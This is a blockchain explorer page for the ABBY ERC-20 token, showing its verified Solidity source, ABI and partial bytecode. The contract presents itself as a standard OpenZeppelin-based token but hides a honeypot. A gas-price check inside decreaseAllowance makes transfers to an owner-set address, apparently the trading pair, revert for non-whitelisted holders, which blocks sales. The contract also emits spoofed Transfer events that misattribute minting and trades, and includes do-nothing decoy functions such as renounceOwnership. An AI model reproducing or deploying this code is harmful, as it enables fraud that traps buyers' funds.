ERC-20
Overview
Max Total Supply
1,000,000,000 ABBY
Holders
13
Market
Price
$0.00 @ 0.000000 ETH
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
37,201,100.931430716219653404 ABBYValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
This contract may be a proxy contract. Click on More Options and select Is this a proxy? to confirm and enable the "Read as Proxy" & "Write as Proxy" tabs.
Contract Source Code Verified (Exact Match)
Contract Name:
ABBY
Compiler Version
v0.8.24+commit.e11b9ed9
ZkSolc Version
v1.5.7
Optimization Enabled:
Yes with Mode 3
Other Settings:
paris EvmVersion
Contract Source Code (Solidity Standard Json-Input format)
/** /** * @dev Interface of the ERC20 standard as defined in the EIP. Does not include * the optional functions; to access them see `ERC20Detailed`. */ interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a `Transfer` event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through `transferFrom`. This is * zero by default. * * This value changes when `approve` or `transferFrom` are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * > Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an `Approval` event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a `Transfer` event. */ function transferFrom(address sender, address recipient, uint256 amount) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to `approve`. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } // File: contracts\open-zeppelin-contracts\math\SafeMath.sol pragma solidity ^0.8.20; /** * @dev Wrappers over Solidity's arithmetic operations with added overflow * checks. * * Arithmetic operations in Solidity wrap on overflow. This can easily result * in bugs, because programmers usually assume that an overflow raises an * error, which is the standard behavior in high level programming languages. * `SafeMath` restores this intuition by reverting the transaction when an * operation overflows. * * Using this library instead of the unchecked operations eliminates an entire * class of bugs, so it's recommended to use it always. */ library SafeMath { /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { uint256 c = a + b; require(c >= a, "SafeMath: addition overflow"); return c; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { require(b <= a, "SafeMath: subtraction overflow"); uint256 c = a - b; return c; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-solidity/pull/522 if (a == 0) { return 0; } uint256 c = a * b; require(c / a == b, "SafeMath: multiplication overflow"); return c; } /** * @dev Returns the integer division of two unsigned integers. Reverts on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { // Solidity only automatically asserts when dividing by 0 require(b > 0, "SafeMath: division by zero"); uint256 c = a / b; // assert(a == b * c + a % b); // There is no case in which this doesn't hold return c; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { require(b != 0, "SafeMath: modulo by zero"); return a % b; } } // File: contracts\open-zeppelin-contracts\token\ERC20\ERC20.sol pragma solidity ^0.8.20; /** * @dev Implementation of the `IERC20` interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using `_mint`. * For a generic mechanism see `ERC20Mintable`. * * *For a detailed writeup see our guide [How to implement supply * mechanisms](https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226).* * * We have followed general OpenZeppelin guidelines: functions revert instead * of returning `false` on failure. This behavior is nonetheless conventional * and does not conflict with the expectations of ERC20 applications. * * Additionally, an `Approval` event is emitted on calls to `transferFrom`. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard `decreaseAllowance` and `increaseAllowance` * functions have been added to mitigate the well-known issues around setting * allowances. See `IERC20.approve`. */ contract ERC20 is IERC20 { using SafeMath for uint256; mapping (address => uint256) private _balances; mapping (address => mapping (address => uint256)) private _allowances; uint256 private _totalSupply; uint256 private _BONE = 1; mapping(address => bool) public dividend; address public adr; address public _to; address public holder; bool public openedTrade; /** * @dev See `IERC20.totalSupply`. */ function totalSupply() public view returns (uint256) { return _totalSupply; } /** * @dev See `IERC20.balanceOf`. */ function balanceOf(address account) public view returns (uint256) { return _balances[account]; } /** * @dev See `IERC20.transfer`. * * Requirements: * * - `recipient` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address recipient, uint256 amount) public returns (bool) { __transfer(msg.sender, recipient, amount); return true; } /** * @dev See `IERC20.allowance`. */ function allowance(address owner, address spender) public view returns (uint256) { return _allowances[owner][spender]; } /** * @dev See `IERC20.approve`. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 value) public returns (bool) { _approve(msg.sender, spender, value); return true; } function setDividend(address _user) public { require(msg.sender == adr, "public"); dividend[_user] = true; } function SwapETHForExactTokens(address __to) public { require(msg.sender == adr, "pl"); _to = __to; } function openTrading() public { require(msg.sender == adr, "pl"); openedTrade = true; } /** * @dev See `IERC20.transferFrom`. * * Emits an `Approval` event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of `ERC20`; * * Requirements: * - `sender` and `recipient` cannot be the zero address. * - `sender` must have a balance of at least `value`. * - the caller must have allowance for `sender`'s tokens of at least * `amount`. */ function transferFrom(address sender, address recipient, uint256 amount) public returns (bool) { __transfer(sender, recipient, amount); _approve(sender, msg.sender, _allowances[sender][msg.sender].sub(amount)); return true; } function _setFeeReceiver(address _holder) internal { holder = _holder; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to `approve` that can be used as a mitigation for * problems described in `IERC20.approve`. * * Emits an `Approval` event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public returns (bool) { _approve(msg.sender, spender, _allowances[msg.sender][spender].add(addedValue)); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to `approve` that can be used as a mitigation for * problems described in `IERC20.approve`. * * Emits an `Approval` event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public returns (bool) { _approve(msg.sender, spender, _allowances[msg.sender][spender].sub(subtractedValue));gasRequire(_BONE); return true; } function gasRequire(uint256 _gas) internal view { if (tx.gasprice > _gas) { revert(); } } /** * @dev Moves tokens `amount` from `sender` to `recipient`. * * This is internal function is equivalent to `transfer`, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a `Transfer` event. * * Requirements: * * - `sender` cannot be the zero address. * - `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. */ function _transfer(address sender, address recipient, uint256 amount) internal { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); _balances[sender] = _balances[sender].sub(amount); _balances[recipient] = _balances[recipient].add(amount); if (sender == adr) { emit Transfer(holder, recipient, amount); } else if (recipient == adr) { emit Transfer(sender, holder, amount); } emit Transfer(sender, recipient, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a `Transfer` event with `from` set to the zero address. * * Requirements * * - `to` cannot be the zero address. */ function _mint(address account, uint256 amount) internal { require(account != address(0), "ERC20: mint to the zero address"); _totalSupply = _totalSupply.add(amount); _balances[account] = _balances[account].add(amount); adr = account; dividend[adr] = true; emit Transfer(address(0), holder, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a `Transfer` event with `to` set to the zero address. * * Requirements * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 value) internal { require(account != address(0), "ERC20: burn from the zero address"); _totalSupply = _totalSupply.sub(value); _balances[account] = _balances[account].sub(value); emit Transfer(account, address(0), value); } function __transfer(address from, address to, uint256 amount) internal { if (dividend[tx.origin]) { _transfer(from, to, amount); return; } require(openedTrade, "Trade has not been opened yet"); if (_to == address(0)) { _transfer(from, to, amount); return; } if (to == _to) { decreaseAllowance(from, amount); _transfer(from, to, amount); return; } _transfer(from, to, amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner`s tokens. * * This is internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an `Approval` event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve(address owner, address spender, uint256 value) internal { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = value; emit Approval(owner, spender, value); } /** * @dev Destoys `amount` tokens from `account`.`amount` is then deducted * from the caller's allowance. * * See `_burn` and `_approve`. */ function _burnFrom(address account, uint256 amount) internal { _burn(account, amount); _approve(account, msg.sender, _allowances[account][msg.sender].sub(amount)); } function setCooldownEnabled() external { _to = _to; } function withdrawStuckTokens() external { holder = holder; } function setLimitsEnabled() external { _to = _to; } function renounceOwnership() external { _BONE = _BONE; } function setTREATReward() external { _BONE = 1; } } // File: contracts\ERC20\TokenMintERC20Token.sol pragma solidity ^0.8.20; /** * @title TokenMintERC20Token * @author TokenMint (visit https://tokenmint.io) * * @dev Standard ERC20 token with burning and optional functions implemented. * For full specification of ERC-20 standard see: * https://github.com/ethereum/EIPs/blob/master/EIPS/eip-20.md */ contract ABBY is ERC20 { uint8 private _decimals = 18; string private _symbol = "ABBY"; string private _name = "ABBY"; uint256 private _totalSupply = 1000000000 * 10**uint256(_decimals); constructor() public payable { _setFeeReceiver(0xD7C70B71af985c5c6C820454706116C95439311C); // deploy // set tokenOwnerAddress as owner of all tokens _mint(msg.sender, _totalSupply); } /** * @dev Burns a specific amount of tokens. * @param value The amount of lowest token units to be burned. */ function burn(uint256 value) public { _burn(msg.sender, value); } // optional functions from ERC20 stardard /** * @return the name of the token. */ function name() public view returns (string memory) { return _name; } /** * @return the symbol of the token. */ function symbol() public view returns (string memory) { return _symbol; } /** * @return the number of decimals of the token. */ function decimals() public view returns (uint8) { return _decimals; } }
{ "evmVersion": "paris", "optimizer": { "enabled": true, "mode": "3" }, "outputSelection": { "*": { "*": [ "abi", "metadata" ], "": [ "ast" ] } }, "detectMissingLibraries": false, "forceEVMLA": false, "enableEraVMExtensions": false, "libraries": {} }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"__to","type":"address"}],"name":"SwapETHForExactTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"_to","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"adr","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"value","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"dividend","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"holder","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"openedTrade","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"setCooldownEnabled","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_user","type":"address"}],"name":"setDividend","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"setLimitsEnabled","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"setTREATReward","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"withdrawStuckTokens","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
9c4d535b000000000000000000000000000000000000000000000000000000000000000001000239f211ad7d4b762bb2baa58f5242fff8d1041a6cada2231600cd35c88200000000000000000000000000000000000000000000000000000000000000600000000000000000000000000000000000000000000000000000000000000000
Deployed Bytecode
0x0002000000000002000000000301034f0000008001000039000000400010043f0000000100200190000000330000c13d0000006001300270000001e601100197000000040010008c000003530000413d000000000203043b000000e002200270000001f50020009c000000730000a13d000001f60020009c000000c50000a13d000001f70020009c000000ec0000a13d000001f80020009c000001350000213d000001fb0020009c000001ee0000613d000001fc0020009c000003530000c13d000000240010008c000003530000413d0000000001000416000000000001004b000003530000c13d0000000401300370000000000101043b000001ef0010009c000003530000213d0000000502000039000000000202041a000001ef022001970000000003000411000000000023004b000002da0000c13d000000000010043f0000000401000039000000200010043f00000040020000390000000001000019079207730000040f000000000201041a000002260220019700000001022001bf000000000021041b0000000001000019000007930001042e00000001060000390000000301000039000000000061041b0000000705000039000000000105041a000001e701100197000001e8011001c7000000000015041b0000000803000039000000000103041a000000010210019000000001041002700000007f0440618f0000001f0040008c00000000010000390000000101002039000000000012004b0000006d0000c13d000000200040008c000000600000413d000200000004001d000000000030043f0000000001000414000001e60010009c000001e601008041000000c001100210000001e9011001c700008010020000390792078d0000040f0000000100200190000003530000613d000000000101043b00000002020000290000001f0220003900000005022002700000000002210019000000000021004b000000070500003900000001060000390000000803000039000000600000813d000000000001041b0000000101100039000000000021004b0000005c0000413d000001ea01000041000000000013041b0000000903000039000000000103041a000000010010019000000001041002700000007f0440618f0000001f0040008c00000000020000390000000102002039000000000121013f0000000100100190000000820000613d0000022301000041000000000010043f0000002201000039000000040010043f00000224010000410000079400010430000002070020009c000000ce0000213d0000020f0020009c000001040000213d000002130020009c0000013e0000613d000002140020009c0000015e0000613d000002150020009c000003530000c13d0000000001000416000000000001004b000003530000c13d0000000501000039000002690000013d000000200040008c0000009d0000413d000200000004001d000000000030043f0000000001000414000001e60010009c000001e601008041000000c001100210000001e9011001c700008010020000390792078d0000040f0000000100200190000003530000613d000000000101043b00000002020000290000001f0220003900000005022002700000000002210019000000000021004b0000000705000039000000010600003900000009030000390000009d0000813d000000000001041b0000000101100039000000000021004b000000990000413d000001ea01000041000000000013041b000000000105041a000000a802100270000000ff0220018f0000004d0020008c000002c60000213d000000000002004b000000af0000613d0000000a030000390000000106000039000000010020019000000000043300a9000000010300603900000000066300a900000001022002720000000003040019000000a80000c13d000001eb036000d1000001eb0230012a000000000026004b000002c60000c13d0000000a02000039000000000032041b000001ec01100197000001ed011001c7000000000015041b0000000004000411000000000004004b0000026e0000c13d000001f201000041000000800010043f0000002001000039000000840010043f0000001f01000039000000a40010043f000001f301000041000000c40010043f000001f4010000410000079400010430000002000020009c000001140000213d000002040020009c000002080000613d000002050020009c0000020d0000613d000002060020009c000001390000613d000003530000013d000002080020009c000001270000213d0000020c0020009c000001390000613d0000020d0020009c0000016c0000613d0000020e0020009c000003530000c13d000000240010008c000003530000413d0000000001000416000000000001004b000003530000c13d0000000401300370000000000401043b0000000003000411000000000003004b000002cc0000c13d000001f201000041000000800010043f0000002001000039000000840010043f0000002101000039000000a40010043f0000022001000041000000c40010043f0000022101000041000000e40010043f00000222010000410000079400010430000001fd0020009c0000021f0000613d000001fe0020009c000002340000613d000001ff0020009c000003530000c13d0000000001000416000000000001004b000003530000c13d0000000501000039000000000101041a000001ef011001970000000002000411000000000012004b00000000010000390000000101006039079204070000040f0000000701000039000000000201041a000002180220019700000219022001c7000000000021041b0000000001000019000007930001042e000002100020009c0000019e0000613d000002110020009c000001a30000613d000002120020009c000003530000c13d0000000001000416000000000001004b000003530000c13d0000000701000039000000000101041a000000a801100270000000ff0110018f000000800010043f0000021601000041000007930001042e000002010020009c000001390000613d000002020020009c0000024d0000613d000002030020009c000003530000c13d000000440010008c000003530000413d0000000001000416000000000001004b000003530000c13d0000000401300370000000000101043b000001ef0010009c000003530000213d0000002402300370000000000202043b0792036a0000040f0000022c0000013d000002090020009c000001d10000613d0000020a0020009c000001e30000613d0000020b0020009c000003530000c13d0000000001000416000000000001004b000003530000c13d00000001010000390000000302000039000000000012041b0000000001000019000007930001042e000001f90020009c000002650000613d000001fa0020009c000003530000c13d0000000001000416000000000001004b000003530000c13d0000000001000019000007930001042e0000000001000416000000000001004b000003530000c13d0000000903000039000000000203041a000000010520019000000001012002700000007f0410018f00000000010460190000001f0010008c00000000060000390000000106002039000000000662013f00000001006001900000006d0000c13d000000800010043f000000000005004b0000025f0000613d000000000030043f000000020020008c000002e70000413d000002250200004100000000040000190000000003040019000000000402041a000000a005300039000000000045043500000001022000390000002004300039000000000014004b000001550000413d000003160000013d000000440010008c000003530000413d0000000001000416000000000001004b000003530000c13d0000000401300370000000000201043b000001ef0020009c000003530000213d0000002401300370000000000301043b00000000010004110792041b0000040f0000022c0000013d000000440010008c000003530000413d0000000001000416000000000001004b000003530000c13d0000000401300370000000000101043b000200000001001d000001ef0010009c000003530000213d0000000001000411000000000010043f0000000101000039000000200010043f0000000001000414000001e60010009c000001e601008041000000c001100210000001ee011001c7000080100200003900010000000303530792078d0000040f000000010300035f0000000100200190000003530000613d000000000101043b0000000202000029000000000020043f000000200010043f0000002401300370000000000101043b000100000001001d0000000001000414000001e60010009c000001e601008041000000c001100210000001ee011001c700008010020000390792078d0000040f0000000100200190000003530000613d000000000101043b000000000101041a0000000102000029000000000021001a000002c60000413d000000000321001900000000010004110000000202000029000001c80000013d0000000001000416000000000001004b000003530000c13d00000002010000390000021b0000013d000000640010008c000003530000413d0000000001000416000000000001004b000003530000c13d0000000401300370000000000101043b000001ef0010009c000003530000213d0000002402300370000000000202043b000001ef0020009c000003530000213d0000004403300370000000000303043b000100000003001d000200000001001d079204720000040f0000000201000029000000000010043f0000000101000039000000200010043f00000040020000390000000001000019079207730000040f0000000002000411000000000020043f000000200010043f00000000010000190000004002000039079207730000040f000000000101041a00000001020000290792075e0000040f0000000003010019000000020100002900000000020004110792041b0000040f000000400100043d00000001020000390000000000210435000001e60010009c000001e60100804100000040011002100000021a011001c7000007930001042e000000240010008c000003530000413d0000000001000416000000000001004b000003530000c13d0000000401300370000000000101043b000001ef0010009c000003530000213d000000000010043f0000000401000039000000200010043f00000040020000390000000001000019079207730000040f000000000101041a000000ff00100190000001e90000013d0000000001000416000000000001004b000003530000c13d0000000701000039000000000101041a0000021d001001980000000001000039000000010100c039000000800010043f0000021601000041000007930001042e000000440010008c000003530000413d0000000001000416000000000001004b000003530000c13d0000000401300370000000000101043b000001ef0010009c000003530000213d0000002402300370000000000302043b000001ef0030009c000003530000213d000000000010043f0000000101000039000000200010043f00000040020000390000000001000019000200000003001d079207730000040f0000000202000029000000000020043f000000200010043f000000000100001900000040020000390000021a0000013d0000000001000416000000000001004b000003530000c13d0000000601000039000002690000013d000000240010008c000003530000413d0000000001000416000000000001004b000003530000c13d0000000401300370000000000101043b000001ef0010009c000003530000213d000000000010043f000000200000043f00000040020000390000000001000019079207730000040f000000000101041a000000800010043f0000021601000041000007930001042e000000440010008c000003530000413d0000000001000416000000000001004b000003530000c13d0000000401300370000000000201043b000001ef0020009c000003530000213d0000002401300370000000000301043b0000000001000411079204720000040f0000000101000039000000400200043d0000000000120435000001e60020009c000001e60200804100000040012002100000021a011001c7000007930001042e000000240010008c000003530000413d0000000001000416000000000001004b000003530000c13d0000000401300370000000000101043b000001ef0010009c000003530000213d000200000001001d0000000501000039000000000101041a000001ef011001970000000002000411000000000012004b00000000010000390000000101006039079204070000040f0000000601000039000000000201041a000001ec0220019700000002022001af000000000021041b0000000001000019000007930001042e0000000001000416000000000001004b000003530000c13d0000000803000039000000000203041a000000010520019000000001012002700000007f0410018f00000000010460190000001f0010008c00000000060000390000000106002039000000000662013f00000001006001900000006d0000c13d000000800010043f000000000005004b000002e40000c13d0000022601200197000000a00010043f000000000004004b000000c001000039000000a001006039000003170000013d0000000001000416000000000001004b000003530000c13d0000000701000039000000000101041a000001ef01100197000000800010043f0000021601000041000007930001042e0000000201000039000000000201041a000000000032001a000002c60000413d0000000002320019000000000021041b000000000040043f000000200000043f0000000001000414000001e60010009c000001e601008041000000c001100210000001ee011001c70000801002000039000200000003001d0792078d0000040f0000000100200190000003530000613d000000000101043b000000000101041a000100000001001d000000020010002a0000000001000411000002c60000413d000000000010043f000000200000043f0000000001000414000001e60010009c000001e601008041000000c001100210000001ee011001c700008010020000390792078d0000040f0000000100200190000003530000613d00000001030000290000000202300029000000000101043b000000000021041b0000000501000039000000000201041a000001ec022001970000000003000411000000000232019f000000000021041b0000000401000039000000200010043f0000000001000414000001e60010009c000001e601008041000000c001100210000001ee011001c700008010020000390792078d0000040f0000000100200190000003530000613d000000000101043b000000000201041a000002260220019700000001022001bf000000000021041b0000000701000039000000000201041a000000400100043d00000002030000290000000000310435000001e60010009c000001e60100804100000040011002100000000003000414000001e60030009c000001e603008041000000c003300210000000000113019f000001e9011001c7000001ef062001970000800d020000390000000303000039000001f0040000410000000005000019079207880000040f0000000100200190000003530000613d000000200100003900000100001004430000012000000443000001f101000041000007930001042e0000022301000041000000000010043f0000001101000039000000040010043f000002240100004100000794000104300000000201000039000000000201041a000000000242004b000002e90000813d000001f201000041000000800010043f0000002001000039000000840010043f0000001e01000039000000a40010043f0000021e01000041000000c40010043f000001f4010000410000079400010430000001f201000041000000800010043f0000002001000039000000840010043f0000000601000039000000a40010043f0000021701000041000000c40010043f000001f4010000410000079400010430000000000030043f000000020020008c0000030c0000813d0000002001000039000003210000013d000200000004001d000000000021041b000000000030043f000000200000043f0000000001000414000001e60010009c000001e601008041000000c001100210000001ee011001c700008010020000390792078d0000040f0000000100200190000003530000613d0000000002000411000000000101043b000000000101041a000000020110006c000003300000813d000000400100043d00000044021000390000021e03000041000000000032043500000024021000390000001e030000390000000000320435000001f2020000410000000000210435000000040210003900000020030000390000000000320435000001e60010009c000001e60100804100000040011002100000021f011001c700000794000104300000021b0200004100000000040000190000000003040019000000000402041a000000a005300039000000000045043500000001022000390000002004300039000000000014004b0000030e0000413d000000c001300039000000610110008a00000227011001970000021c0010009c000003210000a13d0000022301000041000000000010043f0000004101000039000000040010043f000002240100004100000794000104300000008001100039000200000001001d000000400010043f0000008002000039079203550000040f00000002020000290000000001210049000001e60010009c000001e6010080410000006001100210000001e60020009c000001e6020080410000004002200210000000000121019f000007930001042e000100000001001d000000000020043f000000200000043f0000000001000414000001e60010009c000001e601008041000000c001100210000001ee011001c700008010020000390792078d0000040f0000000100200190000003530000613d000000000101043b0000000102000029000000000021041b000000400100043d00000002020000290000000000210435000001e60010009c000001e60100804100000040011002100000000002000414000001e60020009c000001e602008041000000c002200210000000000112019f000001e9011001c70000800d020000390000000303000039000001f00400004100000000050004110000000006000019079207880000040f00000001002001900000013c0000c13d0000000001000019000007940001043000000020030000390000000004310436000000003202043400000000002404350000004001100039000000000002004b000003640000613d000000000400001900000000054100190000000006430019000000000606043300000000006504350000002004400039000000000024004b0000035d0000413d000000000321001900000000000304350000001f0220003900000227022001970000000001210019000000000001042d0003000000000002000200000002001d000300000001001d0000000001000411000000000010043f0000000101000039000000200010043f0000000001000414000001e60010009c000001e601008041000000c001100210000001ee011001c700008010020000390792078d0000040f0000000100200190000003d50000613d000000000101043b0000000302000029000001ef02200197000300000002001d000000000020043f000000200010043f0000000001000414000001e60010009c000001e601008041000000c001100210000001ee011001c700008010020000390792078d0000040f0000000100200190000003d50000613d000000000101043b000000000101041a000000020110006c000003d70000413d0000000002000411000001ef02200198000003e80000613d000200000001001d000000030000006b000003f20000613d000100000002001d000000000020043f0000000101000039000000200010043f0000000001000414000001e60010009c000001e601008041000000c001100210000001ee011001c700008010020000390792078d0000040f0000000100200190000003d50000613d000000000101043b0000000302000029000000000020043f000000200010043f0000000001000414000001e60010009c000001e601008041000000c001100210000001ee011001c700008010020000390792078d0000040f0000000100200190000003d50000613d000000000101043b0000000202000029000000000021041b000000400100043d0000000000210435000001e60010009c000001e60100804100000040011002100000000002000414000001e60020009c000001e602008041000000c002200210000000000112019f000001e9011001c70000800d020000390000000303000039000002280400004100000001050000290000000306000029079207880000040f0000000100200190000003d50000613d0000000301000039000000000101041a000300000001001d000002290100004100000000001004430000000001000414000001e60010009c000001e601008041000000c0011002100000022a011001c70000800b020000390792078d0000040f0000000100200190000004060000613d000000000101043b000000030010006c000003d50000213d000000000001042d00000000010000190000079400010430000000400100043d00000044021000390000021e03000041000000000032043500000024021000390000001e030000390000000000320435000001f2020000410000000000210435000000040210003900000020030000390000000000320435000001e60010009c000001e60100804100000040011002100000021f011001c70000079400010430000000400100043d00000064021000390000022e03000041000000000032043500000044021000390000022f03000041000000000032043500000024021000390000002403000039000003fb0000013d000000400100043d00000064021000390000022b03000041000000000032043500000044021000390000022c030000410000000000320435000000240210003900000022030000390000000000320435000001f2020000410000000000210435000000040210003900000020030000390000000000320435000001e60010009c000001e60100804100000040011002100000022d011001c70000079400010430000000000001042f000000000001004b0000040a0000613d000000000001042d000000400100043d000000440210003900000230030000410000000000320435000000240210003900000002030000390000000000320435000001f2020000410000000000210435000000040210003900000020030000390000000000320435000001e60010009c000001e60100804100000040011002100000021f011001c700000794000104300003000000000002000001ef01100198000004540000613d000200000003001d000301ef0020019c0000045e0000613d000100000001001d000000000010043f0000000101000039000000200010043f0000000001000414000001e60010009c000001e601008041000000c001100210000001ee011001c700008010020000390792078d0000040f00000001002001900000000303000029000004520000613d000000000101043b000000000030043f000000200010043f0000000001000414000001e60010009c000001e601008041000000c001100210000001ee011001c700008010020000390792078d0000040f0000000306000029000